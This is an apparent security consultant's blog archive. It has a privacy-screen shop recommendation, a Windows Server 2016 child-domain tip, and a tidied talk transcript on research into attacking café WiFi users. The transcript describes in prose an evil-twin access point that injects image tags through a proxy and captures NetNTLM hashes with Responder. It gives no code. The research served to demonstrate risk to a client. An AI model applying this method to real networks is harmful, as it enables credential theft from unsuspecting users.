Author Archives: Felix

Custom adhesive-backed laser cut privacy screens for laptops

Years ago I bought privacy screens for the company computers I was working for at the time. The reasons that I really hated them were:

  • I couldn’t stand the dirt and grime that constantly collected behind them
  • the unsightly attachment mechanisms and the fact that they kept falling off my laptop every time I closed the screen.

Eventually, I found a company that was willing to make a custom order for privacy screens and better still, they were self-adhesive which meant they couldn’t fall off, there were no ugly attachments, and they couldn’t get dirt stuck behind them.

I tried to find these guys again recently and really struggled – I kept finding garden screens and other random products on Amazon. After searching for a while I found the company again and now they even have an online shop. SO I don’t lose the link again, here they are: Protectionfilms24

The procedure to find the privacy screen for your computer, laptop or any device is pretty simple and user friendly if it is a standard size.  When you enter the website you will see the Blue box below.

When you press the arrow a list of devices will appear. Choose the device you want to add the privacy screen.

Screenshot_from_protectionfilms24-com_select_privacy_screen_for_a_device
Screenshot from protectionfilms24-com selecting a privacy screen for a device

The next step is to choose the brand of your device.

Screenshot_from_protectionfilms24 com_selecting_privacy_screen_for_the_right_Brand
Screenshot from protectionfilms24 com selecting privacy screen for the right Brand

They have more than 250.000 products so we can’t show the whole list. But they have privacy screens for all manner of devices, even for cars.

When you choose the right Brand for your device, Protectionfilms24 will provide a list of devices from the specific Brand you decided.

Screenshot_from_-protectionfilms24-com_choosing_the_right_device_from_a specific_Brand
Screenshot from -protectionfilms24-com choosing the right device from a specific Brand

After these three steps a list with results will appear that include the parameters you entered.

Privacy Screens help to protect from visual hackers, thus if you work in public spaces it is a good idea to use one.

Conference Talk London 2018 |How to attack computers at cafes

Earlier this year, I was honoured to speak at the Security B-Sides London 2018 conference on the Rookie track. I presented the research I completed for my Master’s degree in the use of Unencrypted WiFi networks by business users. They recorded all the sessions and it is now available on YouTube.

My work builds on top of known attacks and existing software. It attempts to establish whether or not it is possible to extract NetNTLM hashes from computers connected to unencrypted WiFi networks.

If you want the full presentation document click on the link: Slide Deck “How to: Actually attack computers at cafes”

If you want to test your company’s cyber security Contact us and we will help you with your cybersecurity needs.

Transcript of my presentation |How to attack computers at cafes

This transcript has been tidied up a bit from the original speech because it doesn’t read brilliantly, but the message is the same.

Who am I?

Hi Everyone, I’m Felix and I’m a pen tester. I’ve been doing this for a while now and breaking into stuff for longer.

Why this research?

Today I am here to talk to you about some work that I did for my Masters dissertation. I was told to go away, find a project and do some research. At the same time I had a client that basically refused to take my word for it. They told me that they had lots of staff that spent a lot of time in airports and hotels and used free WiFi without a VPN or other protection. Essentially they had all their traffic going across the Internet without extra protection and this worried me.

The client turned round to me when I was telling him about the problem and stopped me saying “Can you prove it? Can you show me this? Because if you can’t I’m probably not going to do anything about it.” I had a look around but I couldn’t find a tool where the output would be something the business would care about. So I started out writing one myself.

Open WiFi MitM Condition

The work I am about to show you is based on a Man-in-the-Middle (MitM) attack. As a recap for those who may or may not know it: MitM conditions are essentially where you have some attacker controlled infrastructure where the attacker can do something to the communication between legitimate users and servers.

What can you do with MitM conditions?

These include reading the communication, modifying the communication and blocking the communication.

What I set out to do

I decided I was going to make my own Wi-Fi access point and make it steal user creds by being a MitM. I was hoping to then turn round to my client and give that demonstration so they would do something about their issue. At the time, I thought it would be easy, you know, why would it be hard, it’s open WiFi right?

Turns out encryption is a thing…

It turns out encryption is a thing… Obviously I already knew this, but it can be done at lots of different places in a communication. These days there’s not that much in terms of plain text creds going around the world. It’s usually encrypted somewhere and so that proved very quickly to me that I needed to so do something a bit different.

The idea

The idea was to go from a normal transaction to a little bit more like this diagram. I already had a bit of a plan based on some other work that I’ve seen and I know is quite prevalent. Essentially the attacker does stuff down at the bottom of this diagram. The section in pink is the bit where the attacker can take action.

What I actually did

I took a WiFi Pineapple and I set up a wireless network. I thought I was pretty obvious with the name that I used – “DANGER ZONE – DO NOT USE” – so that no one would connect to it. But people did anyway. I had a 4G modem, my WiFi Pineapple, and a battery. I wanted to prove to my clients that it was portable and you could do the attack anywhere.

Developed a tool

I took someone else’s code, frankly because it was easy and it already worked, and then I added stuff to it. My development process, over quite a long time, was where I would build a bit and it would work a bit and then I would find a bug. This quickly made me want to tear my hair out. I’d regularly leave the project and come back to it later – the hallmark of a good software development lifecycle obviously…

Fundamentally the tool is a transparent HTTP proxy which is sat on top of the SMB capture stack from Responder. Importantly, the proxy injects an HTML image tag. Because I knew I couldn’t get plaintext creds I aimed at getting a NetNTLM hash instead for later cracking. I called the tool ETAC: Evil Twin Authentication Capture.

Windows auth

One of the things you can do with Windows Auth is use programs like Internet Explorer to perform authentication. I was convinced that it was really important for me to make sure that my research worked against as stock a Windows as possible. I’ve seen lots of presentations of a similar nature that require the Operating System to be tweaked and the security weakened. I wanted this demonstration to be as real as possible so I didn’t install anything, no Firefox or anything along those lines. The only change I made, which you will see in a bit is I added them to an Active Directory domain.

Windows auth – the dot rule

So to clarify, I am trying to get Internet Explorer to authenticate against something. In the default configuration the security settings restrict this automatic login to the Intranet zone. If the machine thinks it is in an Intranet it will do what I need it to. The Intranet is defined by the settings in Internet Explorer. By default this means anything you explicitly list as part of the Intranet, any sites that don’t go through a configured proxy server, and those that are accessed via a UNC path. This last one is better understood as “the dot rule” and means that you can’t do it against IP addresses of Fully Qualified Domain Names (FQDNs). This is because both IPs and FQDNs have dots in them. All this meant the attack needed a DNS server.

The final attack flow

The diagram is what my attack flow ended up looking like:

  • The victim joins the evil twin wireless network and asks for a DHCP lease
  • The DHCP lease is supplied by the attackers DHCP server
  • Then an HTTP request goes through the evil web proxy
  • The web proxy downgrades the request as much as possible to enable easy injection on the response. This includes removing or altering HTTP headers and so on but not things like SSL stripping.
  • The HTTP response then gets an image tag injected into it
  • Which then creates a DNS resolution request
  • And then the SMB stack from responder kicks in and helpfully provides authentication capabilities

The challenges / HTTP is a pain

That all sounds like it should be amazing and work nicely and it kinda works… I had lots of problems:

  • First of all HTTP is a pain, there are a lot of variants in it.
  • The WiFi Pineapple doesn’t have a lot of power so I couldn’t just use other peoples libraries. This meant that I had to write a lot of this myself.
  • I found that there were status codes coming up with problems that I had no idea about and not seen before like an HTTP 416 error. This is “Range not satisfiable” – what on Earth does that mean?
  • Lots of HTTP headers were causing me problems.
  • Normal error handling was also tricky because sometimes connections and just not completed properly.
  • I discovered that there are behavioural differences between the use of transparent proxies and declared proxies. One of the things that is different is that transparent proxies don’t get explicitly told what port to actually go and make the request on. This is because its part of the original TCP connection. If you are doing iptables manipulations you lose some of that information. It’s often easy to guess but that isn’t great and it still needs coding up.

Transaction size and chunking

My favourite challenge was HTTP chunking and the differences between HTTP 1.0 and 1.1. Although they are a bit interchangable one of the biggest headaches I had was dealing with Chunked Transfer Encoding (CTE). In CTE you get a chunk of information and then the next chunk and so on. This is fine but there seems to be two different types of CTE: marked and unmarked.

When you think about it, I am trying to inject an HTML tag so I had to be quite careful with where that tag goes. Otherwise you end up with half of the injected tag in one chunk and half in the next chunk. Alternatively, you can save the whole response in the transparent proxy, manipulate it and the spit it out at the end. But this introduces delays which might make users suspicious of the gateway.

Successes and failures

The success I had was the fact that a standalone Windows 7 machine gave me NetNTLM creds no problem whatsoever, every single time it was happy. Unfortunately the moment I joined the machine to an Active Directory domain, things started going a bit pear shaped. Unfortuantely, what happens is that the SMB connection starts and almost straight away the targeted machine tries to work out where it’s Kerberos KDC is. It performs DNS resolution for the FQDN of the Active Directory Domain that it knows about. When it doesn’t get a response, or a “no such name” response, it literally just sends an RST packet ending the connection to my attacking infrastructure. Game Over….

There are lots of ways I think I could develop this further. I ran out of time for my Master’s thesis so I had to submit and it was fine. I think you might well be able to develop it to impersonate the KDC. Perhaps, depending on what it is looking for to prove that it is within the correct network it might be possible to trick it and get the authentication desired.

Summary

The tool is on GitHub, I definitely could develop it further. Machines joined to a domain are not vulnerable to this attack (yet), but those that are not domain joined are vulnerable.

Thank you very much, are there any questions?

Creating a new child domain – Microsoft Windows 2016 Server

Well, that was several hours of my life I won’t get back. Creating a new child domain is not an easy task, but we like challenges. This article will help you save many hours from finding how to create a new child domain.

TL;DR;

– Microsoft error messages still suck in Windows Server 2016
– Add the member server that will become the child-domain domain-controller to the parent domain before promoting it to a DC.

I was recently on a non-standard job. My client was interested in having a brand new Active Directory domain built to the best possible standards of information / “cyber” security.

I haven’t done much blue-team work for a little while, but I am always up for a challenge and this felt like a good opportunity to get my head around some of the challenges of setting up Windows 2016.

First of all, a side note: I hate Windows 2016 Core (aka non-GUI), I’m going to leave that there.

Moving on…

For reasons that are not best-described here, my client wants a silo’d active directory domain architecture.

Essentially, the ability to have different parts of the wider business belong to different container shells, whilst still having overarching control over the whole lot. This means a parent-domain (or root in *nix parlance), this parent domain sits at the top of the Active Directory forest hierarchy.

Each child-domain then inherits “stuff” (technical term) from the parent domain and can set its own controls. As a red-teamer, one goal in this scenario would be to become Enterprise admin, as this is the group that by default is truly in charge.

Long story short, I battled for hours trying to work out how to get this Windows 2016 vanilla-build server to become a domain controller for a child domain within the forest. No joy.

I kept getting a message “auth problem XXX”. Some research indicates that authentication is nothing to do with the problem, and in fact, DNS is the problem.

Go Microsoft with the useful error messages!

Having spent loads of time on the DNS configuration I got nowhere. I tried everything from the obvious pointing the child at the parent for DNS. Manually making DNS zones on the parent and child, and everything in between.

Literally hours of different combinations and I was still not getting anywhere.

I wish I could claim that this was my idea. However, in a state of despair, I called a friend and explained the situation.

His response was.

“Well you have tried everything I would have thought of and I’ll be honest, I’ve never done it before so I am not sure….”

He trailed off and as I was responding he suddenly interrupted me saying.

“have you joined the server that will become the child domain controller to the parent domain and then tried promoting it?”

The answer was no.

At first glance, this doesn’t make much sense as you are trying to add the machine to a sub-domain.

However, when you think a little deeper it does make sense.

The child would then appear in DNS correctly on the parent DNS service. Then they would have a basic trust relationship in place already making authentication “easier”.

So the very short version, to create a new child-domain domain-controller, add the member server that will be promoted to the parent domain first.

You want to upgrade your cybersecurity?

Contact us and increase your cybersecurity